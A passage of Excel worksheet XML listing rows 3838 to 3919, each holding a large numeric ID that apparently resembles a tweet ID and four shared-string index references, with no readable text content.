    <row r="3838" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3838">
        <v>1.23474114575997E+18</v>
      </c>
      <c r="B3838" t="s">
        <v>9615</v>
      </c>
      <c r="C3838" t="s">
        <v>1</v>
      </c>
      <c r="D3838" t="s">
        <v>9616</v>
      </c>
      <c r="E3838" t="s">
        <v>9617</v>
      </c>
    </row>
    <row r="3839" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3839">
        <v>1.2347407970288699E+18</v>
      </c>
      <c r="B3839" t="s">
        <v>9618</v>
      </c>
      <c r="C3839" t="s">
        <v>1</v>
      </c>
      <c r="D3839" t="s">
        <v>9619</v>
      </c>
      <c r="E3839" t="s">
        <v>9620</v>
      </c>
    </row>
    <row r="3840" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3840">
        <v>1.2347407721566001E+18</v>
      </c>
      <c r="B3840" t="s">
        <v>9621</v>
      </c>
      <c r="C3840" t="s">
        <v>1</v>
      </c>
      <c r="D3840" t="s">
        <v>9622</v>
      </c>
      <c r="E3840" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3841" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3841">
        <v>1.2347406008948201E+18</v>
      </c>
      <c r="B3841" t="s">
        <v>9623</v>
      </c>
      <c r="C3841" t="s">
        <v>1</v>
      </c>
      <c r="D3841" t="s">
        <v>9624</v>
      </c>
      <c r="E3841" t="s">
        <v>9625</v>
      </c>
    </row>
    <row r="3842" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3842">
        <v>1.2347405027397701E+18</v>
      </c>
      <c r="B3842" t="s">
        <v>9626</v>
      </c>
      <c r="C3842" t="s">
        <v>1</v>
      </c>
      <c r="D3842" t="s">
        <v>9627</v>
      </c>
      <c r="E3842" t="s">
        <v>9628</v>
      </c>
    </row>
    <row r="3843" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3843">
        <v>1.2347403050496E+18</v>
      </c>
      <c r="B3843" t="s">
        <v>9629</v>
      </c>
      <c r="C3843" t="s">
        <v>1</v>
      </c>
      <c r="D3843" t="s">
        <v>9630</v>
      </c>
      <c r="E3843" t="s">
        <v>7965</v>
      </c>
    </row>
    <row r="3844" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3844">
        <v>1.2347401423399099E+18</v>
      </c>
      <c r="B3844" t="s">
        <v>9631</v>
      </c>
      <c r="C3844" t="s">
        <v>1</v>
      </c>
      <c r="D3844" t="s">
        <v>9632</v>
      </c>
      <c r="E3844" t="s">
        <v>9633</v>
      </c>
    </row>
    <row r="3845" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3845">
        <v>1.23473989296766E+18</v>
      </c>
      <c r="B3845" t="s">
        <v>9634</v>
      </c>
      <c r="C3845" t="s">
        <v>1</v>
      </c>
      <c r="D3845" t="s">
        <v>9635</v>
      </c>
      <c r="E3845" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="3846" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3846">
        <v>1.2347394094524401E+18</v>
      </c>
      <c r="B3846" t="s">
        <v>9636</v>
      </c>
      <c r="C3846" t="s">
        <v>1</v>
      </c>
      <c r="D3846" t="s">
        <v>9637</v>
      </c>
      <c r="E3846" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="3847" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3847">
        <v>1.23473810002848E+18</v>
      </c>
      <c r="B3847" t="s">
        <v>9638</v>
      </c>
      <c r="C3847" t="s">
        <v>1</v>
      </c>
      <c r="D3847" t="s">
        <v>9639</v>
      </c>
      <c r="E3847" t="s">
        <v>6633</v>
      </c>
    </row>
    <row r="3848" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3848">
        <v>1.23473741658766E+18</v>
      </c>
      <c r="B3848" t="s">
        <v>9640</v>
      </c>
      <c r="C3848" t="s">
        <v>1</v>
      </c>
      <c r="D3848" t="s">
        <v>9641</v>
      </c>
      <c r="E3848" t="s">
        <v>9642</v>
      </c>
    </row>
    <row r="3849" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3849">
        <v>1.23473724944046E+18</v>
      </c>
      <c r="B3849" t="s">
        <v>9643</v>
      </c>
      <c r="C3849" t="s">
        <v>1</v>
      </c>
      <c r="D3849" t="s">
        <v>9644</v>
      </c>
      <c r="E3849" t="s">
        <v>2200</v>
      </c>
    </row>
    <row r="3850" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3850">
        <v>1.23473723612355E+18</v>
      </c>
      <c r="B3850" t="s">
        <v>9645</v>
      </c>
      <c r="C3850" t="s">
        <v>1</v>
      </c>
      <c r="D3850" t="s">
        <v>9646</v>
      </c>
      <c r="E3850" t="s">
        <v>9647</v>
      </c>
    </row>
    <row r="3851" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3851">
        <v>1.2347371086208599E+18</v>
      </c>
      <c r="B3851" t="s">
        <v>9648</v>
      </c>
      <c r="C3851" t="s">
        <v>1</v>
      </c>
      <c r="D3851" t="s">
        <v>9649</v>
      </c>
      <c r="E3851" t="s">
        <v>6932</v>
      </c>
    </row>
    <row r="3852" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3852">
        <v>1.2347369457517801E+18</v>
      </c>
      <c r="B3852" t="s">
        <v>9650</v>
      </c>
      <c r="C3852" t="s">
        <v>1</v>
      </c>
      <c r="D3852" t="s">
        <v>9651</v>
      </c>
      <c r="E3852" t="s">
        <v>9223</v>
      </c>
    </row>
    <row r="3853" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3853">
        <v>1.23473631995747E+18</v>
      </c>
      <c r="B3853" t="s">
        <v>9652</v>
      </c>
      <c r="C3853" t="s">
        <v>1</v>
      </c>
      <c r="D3853" t="s">
        <v>9653</v>
      </c>
      <c r="E3853" t="s">
        <v>6061</v>
      </c>
    </row>
    <row r="3854" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3854">
        <v>1.23473590923025E+18</v>
      </c>
      <c r="B3854" t="s">
        <v>9654</v>
      </c>
      <c r="C3854" t="s">
        <v>1</v>
      </c>
      <c r="D3854" t="s">
        <v>9655</v>
      </c>
      <c r="E3854" t="s">
        <v>9656</v>
      </c>
    </row>
    <row r="3855" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3855">
        <v>1.23473561822529E+18</v>
      </c>
      <c r="B3855" t="s">
        <v>9657</v>
      </c>
      <c r="C3855" t="s">
        <v>1</v>
      </c>
      <c r="D3855" t="s">
        <v>9658</v>
      </c>
      <c r="E3855" t="s">
        <v>8347</v>
      </c>
    </row>
    <row r="3856" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3856">
        <v>1.23473555679123E+18</v>
      </c>
      <c r="B3856" t="s">
        <v>9659</v>
      </c>
      <c r="C3856" t="s">
        <v>1</v>
      </c>
      <c r="D3856" t="s">
        <v>9660</v>
      </c>
      <c r="E3856" t="s">
        <v>9661</v>
      </c>
    </row>
    <row r="3857" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3857">
        <v>1.2347355024203899E+18</v>
      </c>
      <c r="B3857" t="s">
        <v>9662</v>
      </c>
      <c r="C3857" t="s">
        <v>1</v>
      </c>
      <c r="D3857" t="s">
        <v>9663</v>
      </c>
      <c r="E3857" t="s">
        <v>9664</v>
      </c>
    </row>
    <row r="3858" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3858">
        <v>1.2347354060732201E+18</v>
      </c>
      <c r="B3858" t="s">
        <v>9665</v>
      </c>
      <c r="C3858" t="s">
        <v>1</v>
      </c>
      <c r="D3858" t="s">
        <v>9666</v>
      </c>
      <c r="E3858" t="s">
        <v>3626</v>
      </c>
    </row>
    <row r="3859" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3859">
        <v>1.2347353288812001E+18</v>
      </c>
      <c r="B3859" t="s">
        <v>9667</v>
      </c>
      <c r="C3859" t="s">
        <v>1</v>
      </c>
      <c r="D3859" t="s">
        <v>9668</v>
      </c>
      <c r="E3859" t="s">
        <v>9669</v>
      </c>
    </row>
    <row r="3860" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3860">
        <v>1.2347353112525399E+18</v>
      </c>
      <c r="B3860" t="s">
        <v>9670</v>
      </c>
      <c r="C3860" t="s">
        <v>1</v>
      </c>
      <c r="D3860" t="s">
        <v>9671</v>
      </c>
      <c r="E3860" t="s">
        <v>9672</v>
      </c>
    </row>
    <row r="3861" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3861">
        <v>1.23473530868142E+18</v>
      </c>
      <c r="B3861" t="s">
        <v>9673</v>
      </c>
      <c r="C3861" t="s">
        <v>1</v>
      </c>
      <c r="D3861" t="s">
        <v>9674</v>
      </c>
      <c r="E3861" t="s">
        <v>9675</v>
      </c>
    </row>
    <row r="3862" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3862">
        <v>1.2347345614912799E+18</v>
      </c>
      <c r="B3862" t="s">
        <v>9676</v>
      </c>
      <c r="C3862" t="s">
        <v>1</v>
      </c>
      <c r="D3862" t="s">
        <v>9677</v>
      </c>
      <c r="E3862" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="3863" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3863">
        <v>1.23473389747005E+18</v>
      </c>
      <c r="B3863" t="s">
        <v>9678</v>
      </c>
      <c r="C3863" t="s">
        <v>1</v>
      </c>
      <c r="D3863" t="s">
        <v>9679</v>
      </c>
      <c r="E3863" t="s">
        <v>9680</v>
      </c>
    </row>
    <row r="3864" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3864">
        <v>1.2347332688949601E+18</v>
      </c>
      <c r="B3864" t="s">
        <v>9681</v>
      </c>
      <c r="C3864" t="s">
        <v>1</v>
      </c>
      <c r="D3864" t="s">
        <v>9682</v>
      </c>
      <c r="E3864" t="s">
        <v>9683</v>
      </c>
    </row>
    <row r="3865" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3865">
        <v>1.2347332207275899E+18</v>
      </c>
      <c r="B3865" t="s">
        <v>9684</v>
      </c>
      <c r="C3865" t="s">
        <v>1</v>
      </c>
      <c r="D3865" t="s">
        <v>9685</v>
      </c>
      <c r="E3865" t="s">
        <v>9686</v>
      </c>
    </row>
    <row r="3866" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3866">
        <v>1.23473290442674E+18</v>
      </c>
      <c r="B3866" t="s">
        <v>9687</v>
      </c>
      <c r="C3866" t="s">
        <v>1</v>
      </c>
      <c r="D3866" t="s">
        <v>9688</v>
      </c>
      <c r="E3866" t="s">
        <v>1515</v>
      </c>
    </row>
    <row r="3867" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3867">
        <v>1.23473229909629E+18</v>
      </c>
      <c r="B3867" t="s">
        <v>9689</v>
      </c>
      <c r="C3867" t="s">
        <v>1</v>
      </c>
      <c r="D3867" t="s">
        <v>9690</v>
      </c>
      <c r="E3867" t="s">
        <v>9691</v>
      </c>
    </row>
    <row r="3868" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3868">
        <v>1.2347320691477199E+18</v>
      </c>
      <c r="B3868" t="s">
        <v>9692</v>
      </c>
      <c r="C3868" t="s">
        <v>1</v>
      </c>
      <c r="D3868" t="s">
        <v>9693</v>
      </c>
      <c r="E3868" t="s">
        <v>2919</v>
      </c>
    </row>
    <row r="3869" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3869">
        <v>1.2347318401640499E+18</v>
      </c>
      <c r="B3869" t="s">
        <v>9694</v>
      </c>
      <c r="C3869" t="s">
        <v>1</v>
      </c>
      <c r="D3869" t="s">
        <v>9695</v>
      </c>
      <c r="E3869" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="3870" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3870">
        <v>1.2347313204435799E+18</v>
      </c>
      <c r="B3870" t="s">
        <v>9696</v>
      </c>
      <c r="C3870" t="s">
        <v>1</v>
      </c>
      <c r="D3870" t="s">
        <v>9697</v>
      </c>
      <c r="E3870" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="3871" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3871">
        <v>1.2347313118746601E+18</v>
      </c>
      <c r="B3871" t="s">
        <v>9698</v>
      </c>
      <c r="C3871" t="s">
        <v>1</v>
      </c>
      <c r="D3871" t="s">
        <v>9699</v>
      </c>
      <c r="E3871" t="s">
        <v>9700</v>
      </c>
    </row>
    <row r="3872" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3872">
        <v>1.2347309386402801E+18</v>
      </c>
      <c r="B3872" t="s">
        <v>9701</v>
      </c>
      <c r="C3872" t="s">
        <v>1</v>
      </c>
      <c r="D3872" t="s">
        <v>9702</v>
      </c>
      <c r="E3872" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="3873" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3873">
        <v>1.23473081273137E+18</v>
      </c>
      <c r="B3873" t="s">
        <v>9703</v>
      </c>
      <c r="C3873" t="s">
        <v>1</v>
      </c>
      <c r="D3873" t="s">
        <v>9704</v>
      </c>
      <c r="E3873" t="s">
        <v>7463</v>
      </c>
    </row>
    <row r="3874" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3874">
        <v>1.2347307913531E+18</v>
      </c>
      <c r="B3874" t="s">
        <v>9705</v>
      </c>
      <c r="C3874" t="s">
        <v>1</v>
      </c>
      <c r="D3874" t="s">
        <v>9706</v>
      </c>
      <c r="E3874" t="s">
        <v>9707</v>
      </c>
    </row>
    <row r="3875" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3875">
        <v>1.23473047194846E+18</v>
      </c>
      <c r="B3875" t="s">
        <v>9708</v>
      </c>
      <c r="C3875" t="s">
        <v>1</v>
      </c>
      <c r="D3875" t="s">
        <v>9709</v>
      </c>
      <c r="E3875" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="3876" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3876">
        <v>1.23473010864189E+18</v>
      </c>
      <c r="B3876" t="s">
        <v>9710</v>
      </c>
      <c r="C3876" t="s">
        <v>1</v>
      </c>
      <c r="D3876" t="s">
        <v>9711</v>
      </c>
      <c r="E3876" t="s">
        <v>9712</v>
      </c>
    </row>
    <row r="3877" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3877">
        <v>1.2347296420551301E+18</v>
      </c>
      <c r="B3877" t="s">
        <v>9713</v>
      </c>
      <c r="C3877" t="s">
        <v>1</v>
      </c>
      <c r="D3877" t="s">
        <v>9714</v>
      </c>
      <c r="E3877" t="s">
        <v>8513</v>
      </c>
    </row>
    <row r="3878" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3878">
        <v>1.2347294906365E+18</v>
      </c>
      <c r="B3878" t="s">
        <v>9715</v>
      </c>
      <c r="C3878" t="s">
        <v>1</v>
      </c>
      <c r="D3878" t="s">
        <v>9716</v>
      </c>
      <c r="E3878" t="s">
        <v>9717</v>
      </c>
    </row>
    <row r="3879" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3879">
        <v>1.2347287157597E+18</v>
      </c>
      <c r="B3879" t="s">
        <v>9718</v>
      </c>
      <c r="C3879" t="s">
        <v>1</v>
      </c>
      <c r="D3879" t="s">
        <v>9719</v>
      </c>
      <c r="E3879" t="s">
        <v>6826</v>
      </c>
    </row>
    <row r="3880" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3880">
        <v>1.2347286434792599E+18</v>
      </c>
      <c r="B3880" t="s">
        <v>9720</v>
      </c>
      <c r="C3880" t="s">
        <v>1</v>
      </c>
      <c r="D3880" t="s">
        <v>9721</v>
      </c>
      <c r="E3880" t="s">
        <v>9722</v>
      </c>
    </row>
    <row r="3881" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3881">
        <v>1.2347282479061701E+18</v>
      </c>
      <c r="B3881" t="s">
        <v>9723</v>
      </c>
      <c r="C3881" t="s">
        <v>1</v>
      </c>
      <c r="D3881" t="s">
        <v>9724</v>
      </c>
      <c r="E3881" t="s">
        <v>6829</v>
      </c>
    </row>
    <row r="3882" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3882">
        <v>1.2347279039355799E+18</v>
      </c>
      <c r="B3882" t="s">
        <v>9725</v>
      </c>
      <c r="C3882" t="s">
        <v>1</v>
      </c>
      <c r="D3882" t="s">
        <v>9726</v>
      </c>
      <c r="E3882" t="s">
        <v>9727</v>
      </c>
    </row>
    <row r="3883" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3883">
        <v>1.2347277944684201E+18</v>
      </c>
      <c r="B3883" t="s">
        <v>9728</v>
      </c>
      <c r="C3883" t="s">
        <v>1</v>
      </c>
      <c r="D3883" t="s">
        <v>9729</v>
      </c>
      <c r="E3883" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="3884" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3884">
        <v>1.23472735041328E+18</v>
      </c>
      <c r="B3884" t="s">
        <v>9730</v>
      </c>
      <c r="C3884" t="s">
        <v>1</v>
      </c>
      <c r="D3884" t="s">
        <v>9731</v>
      </c>
      <c r="E3884" t="s">
        <v>9732</v>
      </c>
    </row>
    <row r="3885" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3885">
        <v>1.2347269538040801E+18</v>
      </c>
      <c r="B3885" t="s">
        <v>9733</v>
      </c>
      <c r="C3885" t="s">
        <v>1</v>
      </c>
      <c r="D3885" t="s">
        <v>9734</v>
      </c>
      <c r="E3885" t="s">
        <v>9735</v>
      </c>
    </row>
    <row r="3886" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3886">
        <v>1.23472674449151E+18</v>
      </c>
      <c r="B3886" t="s">
        <v>9736</v>
      </c>
      <c r="C3886" t="s">
        <v>1</v>
      </c>
      <c r="D3886" t="s">
        <v>9737</v>
      </c>
      <c r="E3886" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="3887" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3887">
        <v>1.23472673323391E+18</v>
      </c>
      <c r="B3887" t="s">
        <v>9738</v>
      </c>
      <c r="C3887" t="s">
        <v>1</v>
      </c>
      <c r="D3887" t="s">
        <v>9739</v>
      </c>
      <c r="E3887" t="s">
        <v>9740</v>
      </c>
    </row>
    <row r="3888" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3888">
        <v>1.2347265985002801E+18</v>
      </c>
      <c r="B3888" t="s">
        <v>9741</v>
      </c>
      <c r="C3888" t="s">
        <v>1</v>
      </c>
      <c r="D3888" t="s">
        <v>9742</v>
      </c>
      <c r="E3888" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3889" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3889">
        <v>1.2347265783717499E+18</v>
      </c>
      <c r="B3889" t="s">
        <v>9743</v>
      </c>
      <c r="C3889" t="s">
        <v>1</v>
      </c>
      <c r="D3889" t="s">
        <v>9744</v>
      </c>
      <c r="E3889" t="s">
        <v>9745</v>
      </c>
    </row>
    <row r="3890" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3890">
        <v>1.2347264592409201E+18</v>
      </c>
      <c r="B3890" t="s">
        <v>9746</v>
      </c>
      <c r="C3890" t="s">
        <v>1</v>
      </c>
      <c r="D3890" t="s">
        <v>9747</v>
      </c>
      <c r="E3890" t="s">
        <v>9748</v>
      </c>
    </row>
    <row r="3891" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3891">
        <v>1.23472628231697E+18</v>
      </c>
      <c r="B3891" t="s">
        <v>9749</v>
      </c>
      <c r="C3891" t="s">
        <v>1</v>
      </c>
      <c r="D3891" t="s">
        <v>9750</v>
      </c>
      <c r="E3891" t="s">
        <v>9735</v>
      </c>
    </row>
    <row r="3892" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3892">
        <v>1.2347248144573299E+18</v>
      </c>
      <c r="B3892" t="s">
        <v>9751</v>
      </c>
      <c r="C3892" t="s">
        <v>1</v>
      </c>
      <c r="D3892" t="s">
        <v>9752</v>
      </c>
      <c r="E3892" t="s">
        <v>9735</v>
      </c>
    </row>
    <row r="3893" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3893">
        <v>1.2347243791808699E+18</v>
      </c>
      <c r="B3893" t="s">
        <v>9753</v>
      </c>
      <c r="C3893" t="s">
        <v>1</v>
      </c>
      <c r="D3893" t="s">
        <v>9754</v>
      </c>
      <c r="E3893" t="s">
        <v>9735</v>
      </c>
    </row>
    <row r="3894" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3894">
        <v>1.23472411644129E+18</v>
      </c>
      <c r="B3894" t="s">
        <v>9755</v>
      </c>
      <c r="C3894" t="s">
        <v>1</v>
      </c>
      <c r="D3894" t="s">
        <v>9756</v>
      </c>
      <c r="E3894" t="s">
        <v>3693</v>
      </c>
    </row>
    <row r="3895" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3895">
        <v>1.2347240920134899E+18</v>
      </c>
      <c r="B3895" t="s">
        <v>9757</v>
      </c>
      <c r="C3895" t="s">
        <v>1</v>
      </c>
      <c r="D3895" t="s">
        <v>9758</v>
      </c>
      <c r="E3895" t="s">
        <v>9759</v>
      </c>
    </row>
    <row r="3896" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3896">
        <v>1.2347220167808799E+18</v>
      </c>
      <c r="B3896" t="s">
        <v>9760</v>
      </c>
      <c r="C3896" t="s">
        <v>1</v>
      </c>
      <c r="D3896" t="s">
        <v>9761</v>
      </c>
      <c r="E3896" t="s">
        <v>9762</v>
      </c>
    </row>
    <row r="3897" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3897">
        <v>1.2347219575405801E+18</v>
      </c>
      <c r="B3897" t="s">
        <v>9763</v>
      </c>
      <c r="C3897" t="s">
        <v>1</v>
      </c>
      <c r="D3897" t="s">
        <v>9764</v>
      </c>
      <c r="E3897" t="s">
        <v>9765</v>
      </c>
    </row>
    <row r="3898" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3898">
        <v>1.2347218591002299E+18</v>
      </c>
      <c r="B3898" t="s">
        <v>9766</v>
      </c>
      <c r="C3898" t="s">
        <v>1</v>
      </c>
      <c r="D3898" t="s">
        <v>9767</v>
      </c>
      <c r="E3898" t="s">
        <v>9768</v>
      </c>
    </row>
    <row r="3899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3899">
        <v>1.2347216502409001E+18</v>
      </c>
      <c r="B3899" t="s">
        <v>9769</v>
      </c>
      <c r="C3899" t="s">
        <v>1</v>
      </c>
      <c r="D3899" t="s">
        <v>9770</v>
      </c>
      <c r="E3899" t="s">
        <v>9771</v>
      </c>
    </row>
    <row r="3900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3900">
        <v>1.23472117097453E+18</v>
      </c>
      <c r="B3900" t="s">
        <v>9772</v>
      </c>
      <c r="C3900" t="s">
        <v>1</v>
      </c>
      <c r="D3900" t="s">
        <v>9773</v>
      </c>
      <c r="E3900" t="s">
        <v>6861</v>
      </c>
    </row>
    <row r="3901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3901">
        <v>1.23472107058387E+18</v>
      </c>
      <c r="B3901" t="s">
        <v>9774</v>
      </c>
      <c r="C3901" t="s">
        <v>1</v>
      </c>
      <c r="D3901" t="s">
        <v>9775</v>
      </c>
      <c r="E3901" t="s">
        <v>9776</v>
      </c>
    </row>
    <row r="3902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3902">
        <v>1.2347204848954601E+18</v>
      </c>
      <c r="B3902" t="s">
        <v>9777</v>
      </c>
      <c r="C3902" t="s">
        <v>1</v>
      </c>
      <c r="D3902" t="s">
        <v>9778</v>
      </c>
      <c r="E3902" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3903">
        <v>1.23472019806797E+18</v>
      </c>
      <c r="B3903" t="s">
        <v>9779</v>
      </c>
      <c r="C3903" t="s">
        <v>1</v>
      </c>
      <c r="D3903" t="s">
        <v>9780</v>
      </c>
      <c r="E3903" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="3904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3904">
        <v>1.2347201704946099E+18</v>
      </c>
      <c r="B3904" t="s">
        <v>9781</v>
      </c>
      <c r="C3904" t="s">
        <v>1</v>
      </c>
      <c r="D3904" t="s">
        <v>9782</v>
      </c>
      <c r="E3904" t="s">
        <v>9783</v>
      </c>
    </row>
    <row r="3905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3905">
        <v>1.23472015922851E+18</v>
      </c>
      <c r="B3905" t="s">
        <v>9784</v>
      </c>
      <c r="C3905" t="s">
        <v>1</v>
      </c>
      <c r="D3905" t="s">
        <v>9785</v>
      </c>
      <c r="E3905" t="s">
        <v>9786</v>
      </c>
    </row>
    <row r="3906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3906">
        <v>1.2347184060304499E+18</v>
      </c>
      <c r="B3906" t="s">
        <v>9787</v>
      </c>
      <c r="C3906" t="s">
        <v>1</v>
      </c>
      <c r="D3906" t="s">
        <v>9788</v>
      </c>
      <c r="E3906" t="s">
        <v>9789</v>
      </c>
    </row>
    <row r="3907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3907">
        <v>1.2347182004468301E+18</v>
      </c>
      <c r="B3907" t="s">
        <v>9790</v>
      </c>
      <c r="C3907" t="s">
        <v>1</v>
      </c>
      <c r="D3907" t="s">
        <v>9791</v>
      </c>
      <c r="E3907" t="s">
        <v>9792</v>
      </c>
    </row>
    <row r="3908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3908">
        <v>1.23471807727682E+18</v>
      </c>
      <c r="B3908" t="s">
        <v>9793</v>
      </c>
      <c r="C3908" t="s">
        <v>1</v>
      </c>
      <c r="D3908" t="s">
        <v>9794</v>
      </c>
      <c r="E3908" t="s">
        <v>9795</v>
      </c>
    </row>
    <row r="3909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3909">
        <v>1.2347179342091899E+18</v>
      </c>
      <c r="B3909" t="s">
        <v>9796</v>
      </c>
      <c r="C3909" t="s">
        <v>1</v>
      </c>
      <c r="D3909" t="s">
        <v>9797</v>
      </c>
      <c r="E3909" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3910">
        <v>1.2347178016438999E+18</v>
      </c>
      <c r="B3910" t="s">
        <v>9798</v>
      </c>
      <c r="C3910" t="s">
        <v>1</v>
      </c>
      <c r="D3910" t="s">
        <v>9799</v>
      </c>
      <c r="E3910" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="3911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3911">
        <v>1.23471770389155E+18</v>
      </c>
      <c r="B3911" t="s">
        <v>9800</v>
      </c>
      <c r="C3911" t="s">
        <v>1</v>
      </c>
      <c r="D3911" t="s">
        <v>9801</v>
      </c>
      <c r="E3911" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="3912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3912">
        <v>1.2347169944543201E+18</v>
      </c>
      <c r="B3912" t="s">
        <v>9802</v>
      </c>
      <c r="C3912" t="s">
        <v>1</v>
      </c>
      <c r="D3912" t="s">
        <v>9803</v>
      </c>
      <c r="E3912" t="s">
        <v>9804</v>
      </c>
    </row>
    <row r="3913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3913">
        <v>1.234715959816E+18</v>
      </c>
      <c r="B3913" t="s">
        <v>9805</v>
      </c>
      <c r="C3913" t="s">
        <v>1</v>
      </c>
      <c r="D3913" t="s">
        <v>9806</v>
      </c>
      <c r="E3913" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3914">
        <v>1.2347157724061701E+18</v>
      </c>
      <c r="B3914" t="s">
        <v>9807</v>
      </c>
      <c r="C3914" t="s">
        <v>1</v>
      </c>
      <c r="D3914" t="s">
        <v>3652</v>
      </c>
      <c r="E3914" t="s">
        <v>3653</v>
      </c>
    </row>
    <row r="3915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3915">
        <v>1.2347140943825101E+18</v>
      </c>
      <c r="B3915" t="s">
        <v>9808</v>
      </c>
      <c r="C3915" t="s">
        <v>1</v>
      </c>
      <c r="D3915" t="s">
        <v>9809</v>
      </c>
      <c r="E3915" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="3916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3916">
        <v>1.2347138017290299E+18</v>
      </c>
      <c r="B3916" t="s">
        <v>9810</v>
      </c>
      <c r="C3916" t="s">
        <v>1</v>
      </c>
      <c r="D3916" t="s">
        <v>9811</v>
      </c>
      <c r="E3916" t="s">
        <v>9812</v>
      </c>
    </row>
    <row r="3917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3917">
        <v>1.2347125315469299E+18</v>
      </c>
      <c r="B3917" t="s">
        <v>9813</v>
      </c>
      <c r="C3917" t="s">
        <v>1</v>
      </c>
      <c r="D3917" t="s">
        <v>9814</v>
      </c>
      <c r="E3917" t="s">
        <v>891</v>
      </c>
    </row>
    <row r="3918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3918">
        <v>1.2347124395367099E+18</v>
      </c>
      <c r="B3918" t="s">
        <v>9815</v>
      </c>
      <c r="C3918" t="s">
        <v>1</v>
      </c>
      <c r="D3918" t="s">
        <v>9816</v>
      </c>
      <c r="E3918" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3919">
        <v>1.2347114188905201E+18</v>
